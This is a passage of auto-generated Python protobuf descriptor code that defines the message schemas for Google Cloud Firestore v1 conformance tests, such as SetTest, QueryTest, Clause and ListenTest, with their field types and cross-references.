file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="json_data",
full_name="google.cloud.firestore_v1.proto.SetTest.json_data",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="request",
full_name="google.cloud.firestore_v1.proto.SetTest.request",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="is_error",
full_name="google.cloud.firestore_v1.proto.SetTest.is_error",
index=4,
number=5,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1141,
serialized_end=1322,
)
_UPDATETEST = _descriptor.Descriptor(
name="UpdateTest",
full_name="google.cloud.firestore_v1.proto.UpdateTest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="doc_ref_path",
full_name="google.cloud.firestore_v1.proto.UpdateTest.doc_ref_path",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="precondition",
full_name="google.cloud.firestore_v1.proto.UpdateTest.precondition",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="json_data",
full_name="google.cloud.firestore_v1.proto.UpdateTest.json_data",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="request",
full_name="google.cloud.firestore_v1.proto.UpdateTest.request",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="is_error",
full_name="google.cloud.firestore_v1.proto.UpdateTest.is_error",
index=4,
number=5,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1325,
serialized_end=1506,
)
_UPDATEPATHSTEST = _descriptor.Descriptor(
name="UpdatePathsTest",
full_name="google.cloud.firestore_v1.proto.UpdatePathsTest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="doc_ref_path",
full_name="google.cloud.firestore_v1.proto.UpdatePathsTest.doc_ref_path",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="precondition",
full_name="google.cloud.firestore_v1.proto.UpdatePathsTest.precondition",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="field_paths",
full_name="google.cloud.firestore_v1.proto.UpdatePathsTest.field_paths",
index=2,
number=3,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="json_values",
full_name="google.cloud.firestore_v1.proto.UpdatePathsTest.json_values",
index=3,
number=4,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="request",
full_name="google.cloud.firestore_v1.proto.UpdatePathsTest.request",
index=4,
number=5,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="is_error",
full_name="google.cloud.firestore_v1.proto.UpdatePathsTest.is_error",
index=5,
number=6,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1509,
serialized_end=1762,
)
_DELETETEST = _descriptor.Descriptor(
name="DeleteTest",
full_name="google.cloud.firestore_v1.proto.DeleteTest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="doc_ref_path",
full_name="google.cloud.firestore_v1.proto.DeleteTest.doc_ref_path",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="precondition",
full_name="google.cloud.firestore_v1.proto.DeleteTest.precondition",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="request",
full_name="google.cloud.firestore_v1.proto.DeleteTest.request",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="is_error",
full_name="google.cloud.firestore_v1.proto.DeleteTest.is_error",
index=3,
number=4,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1765,
serialized_end=1927,
)
_SETOPTION = _descriptor.Descriptor(
name="SetOption",
full_name="google.cloud.firestore_v1.proto.SetOption",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="all",
full_name="google.cloud.firestore_v1.proto.SetOption.all",
index=0,
number=1,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="fields",
full_name="google.cloud.firestore_v1.proto.SetOption.fields",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1929,
serialized_end=2013,
)
_QUERYTEST = _descriptor.Descriptor(
name="QueryTest",
full_name="google.cloud.firestore_v1.proto.QueryTest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="coll_path",
full_name="google.cloud.firestore_v1.proto.QueryTest.coll_path",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="clauses",
full_name="google.cloud.firestore_v1.proto.QueryTest.clauses",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="query",
full_name="google.cloud.firestore_v1.proto.QueryTest.query",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="is_error",
full_name="google.cloud.firestore_v1.proto.QueryTest.is_error",
index=3,
number=4,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2016,
serialized_end=2175,
)
_CLAUSE = _descriptor.Descriptor(
name="Clause",
full_name="google.cloud.firestore_v1.proto.Clause",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="select",
full_name="google.cloud.firestore_v1.proto.Clause.select",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="where",
full_name="google.cloud.firestore_v1.proto.Clause.where",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="order_by",
full_name="google.cloud.firestore_v1.proto.Clause.order_by",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="offset",
full_name="google.cloud.firestore_v1.proto.Clause.offset",
index=3,
number=4,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="limit",
full_name="google.cloud.firestore_v1.proto.Clause.limit",
index=4,
number=5,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="start_at",
full_name="google.cloud.firestore_v1.proto.Clause.start_at",
index=5,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="start_after",
full_name="google.cloud.firestore_v1.proto.Clause.start_after",
index=6,
number=7,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="end_at",
full_name="google.cloud.firestore_v1.proto.Clause.end_at",
index=7,
number=8,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="end_before",
full_name="google.cloud.firestore_v1.proto.Clause.end_before",
index=8,
number=9,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="clause",
full_name="google.cloud.firestore_v1.proto.Clause.clause",
index=0,
containing_type=None,
fields=[],
)
],
serialized_start=2178,
serialized_end=2656,
)
_SELECT = _descriptor.Descriptor(
name="Select",
full_name="google.cloud.firestore_v1.proto.Select",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="fields",
full_name="google.cloud.firestore_v1.proto.Select.fields",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2658,
serialized_end=2726,
)
_WHERE = _descriptor.Descriptor(
name="Where",
full_name="google.cloud.firestore_v1.proto.Where",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="path",
full_name="google.cloud.firestore_v1.proto.Where.path",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="op",
full_name="google.cloud.firestore_v1.proto.Where.op",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="json_value",
full_name="google.cloud.firestore_v1.proto.Where.json_value",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2728,
serialized_end=2825,
)
_ORDERBY = _descriptor.Descriptor(
name="OrderBy",
full_name="google.cloud.firestore_v1.proto.OrderBy",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="path",
full_name="google.cloud.firestore_v1.proto.OrderBy.path",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="direction",
full_name="google.cloud.firestore_v1.proto.OrderBy.direction",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2827,
serialized_end=2913,
)
_CURSOR = _descriptor.Descriptor(
name="Cursor",
full_name="google.cloud.firestore_v1.proto.Cursor",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="doc_snapshot",
full_name="google.cloud.firestore_v1.proto.Cursor.doc_snapshot",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="json_values",
full_name="google.cloud.firestore_v1.proto.Cursor.json_values",
index=1,
number=2,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2915,
serialized_end=3012,
)
_DOCSNAPSHOT = _descriptor.Descriptor(
name="DocSnapshot",
full_name="google.cloud.firestore_v1.proto.DocSnapshot",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="path",
full_name="google.cloud.firestore_v1.proto.DocSnapshot.path",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="json_data",
full_name="google.cloud.firestore_v1.proto.DocSnapshot.json_data",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3014,
serialized_end=3060,
)
_FIELDPATH = _descriptor.Descriptor(
name="FieldPath",
full_name="google.cloud.firestore_v1.proto.FieldPath",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="field",
full_name="google.cloud.firestore_v1.proto.FieldPath.field",
index=0,
number=1,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3062,
serialized_end=3088,
)
_LISTENTEST = _descriptor.Descriptor(
name="ListenTest",
full_name="google.cloud.firestore_v1.proto.ListenTest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="responses",
full_name="google.cloud.firestore_v1.proto.ListenTest.responses",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="snapshots",
full_name="google.cloud.firestore_v1.proto.ListenTest.snapshots",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="is_error",
full_name="google.cloud.firestore_v1.proto.ListenTest.is_error",
index=2,
number=3,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3091,
serialized_end=3239,
)
_SNAPSHOT = _descriptor.Descriptor(
name="Snapshot",
full_name="google.cloud.firestore_v1.proto.Snapshot",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="docs",
full_name="google.cloud.firestore_v1.proto.Snapshot.docs",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="changes",
full_name="google.cloud.firestore_v1.proto.Snapshot.changes",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="read_time",
full_name="google.cloud.firestore_v1.proto.Snapshot.read_time",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3242,
serialized_end=3405,
)
_DOCCHANGE = _descriptor.Descriptor(
name="DocChange",
full_name="google.cloud.firestore_v1.proto.DocChange",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="kind",
full_name="google.cloud.firestore_v1.proto.DocChange.kind",
index=0,
number=1,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="doc",
full_name="google.cloud.firestore_v1.proto.DocChange.doc",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="old_index",
full_name="google.cloud.firestore_v1.proto.DocChange.old_index",
index=2,
number=3,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="new_index",
full_name="google.cloud.firestore_v1.proto.DocChange.new_index",
index=3,
number=4,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[_DOCCHANGE_KIND],
options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3408,
serialized_end=3632,
)
_TESTFILE.fields_by_name["tests"].message_type = _TEST
_TEST.fields_by_name["get"].message_type = _GETTEST
_TEST.fields_by_name["create"].message_type = _CREATETEST
_TEST.fields_by_name["set"].message_type = _SETTEST
_TEST.fields_by_name["update"].message_type = _UPDATETEST
_TEST.fields_by_name["update_paths"].message_type = _UPDATEPATHSTEST
_TEST.fields_by_name["delete"].message_type = _DELETETEST
_TEST.fields_by_name["query"].message_type = _QUERYTEST
_TEST.fields_by_name["listen"].message_type = _LISTENTEST
_TEST.oneofs_by_name["test"].fields.append(_TEST.fields_by_name["get"])
_TEST.fields_by_name["get"].containing_oneof = _TEST.oneofs_by_name["test"]
_TEST.oneofs_by_name["test"].fields.append(_TEST.fields_by_name["create"])
_TEST.fields_by_name["create"].containing_oneof = _TEST.oneofs_by_name["test"]
_TEST.oneofs_by_name["test"].fields.append(_TEST.fields_by_name["set"])
_TEST.fields_by_name["set"].containing_oneof = _TEST.oneofs_by_name["test"]
_TEST.oneofs_by_name["test"].fields.append(_TEST.fields_by_name["update"])
_TEST.fields_by_name["update"].containing_oneof = _TEST.oneofs_by_name["test"]
_TEST.oneofs_by_name["test"].fields.append(_TEST.fields_by_name["update_paths"])
_TEST.fields_by_name["update_paths"].containing_oneof = _TEST.oneofs_by_name["test"]
_TEST.oneofs_by_name["test"].fields.append(_TEST.fields_by_name["delete"])
_TEST.fields_by_name["delete"].containing_oneof = _TEST.oneofs_by_name["test"]
_TEST.oneofs_by_name["test"].fields.append(_TEST.fields_by_name["query"])
_TEST.fields_by_name["query"].containing_oneof = _TEST.oneofs_by_name["test"]
_TEST.oneofs_by_name["test"].fields.append(_TEST.fields_by_name["listen"])
_TEST.fields_by_name["listen"].containing_oneof = _TEST.oneofs_by_name["test"]
_GETTEST.fields_by_name[
"request"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_firestore__pb2._GETDOCUMENTREQUEST
)
_CREATETEST.fields_by_name[
"request"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_firestore__pb2._COMMITREQUEST
)
_SETTEST.fields_by_name["option"].message_type = _SETOPTION
_SETTEST.fields_by_name[
"request"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_firestore__pb2._COMMITREQUEST
)
_UPDATETEST.fields_by_name[
"precondition"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_common__pb2._PRECONDITION
)
_UPDATETEST.fields_by_name[
"request"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_firestore__pb2._COMMITREQUEST
)
_UPDATEPATHSTEST.fields_by_name[
"precondition"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_common__pb2._PRECONDITION
)
_UPDATEPATHSTEST.fields_by_name["field_paths"].message_type = _FIELDPATH
_UPDATEPATHSTEST.fields_by_name[
"request"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_firestore__pb2._COMMITREQUEST
)
_DELETETEST.fields_by_name[
"precondition"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_common__pb2._PRECONDITION
)
_DELETETEST.fields_by_name[
"request"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_firestore__pb2._COMMITREQUEST
)
_SETOPTION.fields_by_name["fields"].message_type = _FIELDPATH
_QUERYTEST.fields_by_name["clauses"].message_type = _CLAUSE
_QUERYTEST.fields_by_name[
"query"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_query__pb2._STRUCTUREDQUERY
)
_CLAUSE.fields_by_name["select"].message_type = _SELECT
_CLAUSE.fields_by_name["where"].message_type = _WHERE
_CLAUSE.fields_by_name["order_by"].message_type = _ORDERBY
_CLAUSE.fields_by_name["start_at"].message_type = _CURSOR
_CLAUSE.fields_by_name["start_after"].message_type = _CURSOR
_CLAUSE.fields_by_name["end_at"].message_type = _CURSOR
_CLAUSE.fields_by_name["end_before"].message_type = _CURSOR
_CLAUSE.oneofs_by_name["clause"].fields.append(_CLAUSE.fields_by_name["select"])
_CLAUSE.fields_by_name["select"].containing_oneof = _CLAUSE.oneofs_by_name["clause"]
_CLAUSE.oneofs_by_name["clause"].fields.append(_CLAUSE.fields_by_name["where"])
_CLAUSE.fields_by_name["where"].containing_oneof = _CLAUSE.oneofs_by_name["clause"]
_CLAUSE.oneofs_by_name["clause"].fields.append(_CLAUSE.fields_by_name["order_by"])
_CLAUSE.fields_by_name["order_by"].containing_oneof = _CLAUSE.oneofs_by_name["clause"]
_CLAUSE.oneofs_by_name["clause"].fields.append(_CLAUSE.fields_by_name["offset"])
_CLAUSE.fields_by_name["offset"].containing_oneof = _CLAUSE.oneofs_by_name["clause"]
_CLAUSE.oneofs_by_name["clause"].fields.append(_CLAUSE.fields_by_name["limit"])
_CLAUSE.fields_by_name["limit"].containing_oneof = _CLAUSE.oneofs_by_name["clause"]
_CLAUSE.oneofs_by_name["clause"].fields.append(_CLAUSE.fields_by_name["start_at"])
_CLAUSE.fields_by_name["start_at"].containing_oneof = _CLAUSE.oneofs_by_name["clause"]
_CLAUSE.oneofs_by_name["clause"].fields.append(_CLAUSE.fields_by_name["start_after"])
_CLAUSE.fields_by_name["start_after"].containing_oneof = _CLAUSE.oneofs_by_name[
"clause"
]
_CLAUSE.oneofs_by_name["clause"].fields.append(_CLAUSE.fields_by_name["end_at"])
_CLAUSE.fields_by_name["end_at"].containing_oneof = _CLAUSE.oneofs_by_name["clause"]
_CLAUSE.oneofs_by_name["clause"].fields.append(_CLAUSE.fields_by_name["end_before"])
_CLAUSE.fields_by_name["end_before"].containing_oneof = _CLAUSE.oneofs_by_name["clause"]
_SELECT.fields_by_name["fields"].message_type = _FIELDPATH
_WHERE.fields_by_name["path"].message_type = _FIELDPATH
_ORDERBY.fields_by_name["path"].message_type = _FIELDPATH
_CURSOR.fields_by_name["doc_snapshot"].message_type = _DOCSNAPSHOT
_LISTENTEST.fields_by_name[
"responses"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_firestore__pb2._LISTENRESPONSE
)
_LISTENTEST.fields_by_name["snapshots"].message_type = _SNAPSHOT
_SNAPSHOT.fields_by_name[
"docs"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_document__pb2._DOCUMENT
)
_SNAPSHOT.fields_by_name["changes"].message_type = _DOCCHANGE
_SNAPSHOT.fields_by_name[
"read_time"
].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_DOCCHANGE.fields_by_name["kind"].enum_type = _DOCCHANGE_KIND
_DOCCHANGE.fields_by_name[
"doc"
].message_type = (
google_dot_cloud_dot_firestore__v1_dot_proto_dot_document__pb2._DOCUMENT
)
_DOCCHANGE_KIND.containing_type = _DOCCHANGE
DESCRIPTOR.message_types_by_name["TestFile"] = _TESTFILE
DESCRIPTOR.message_types_by_name["Test"] = _TEST
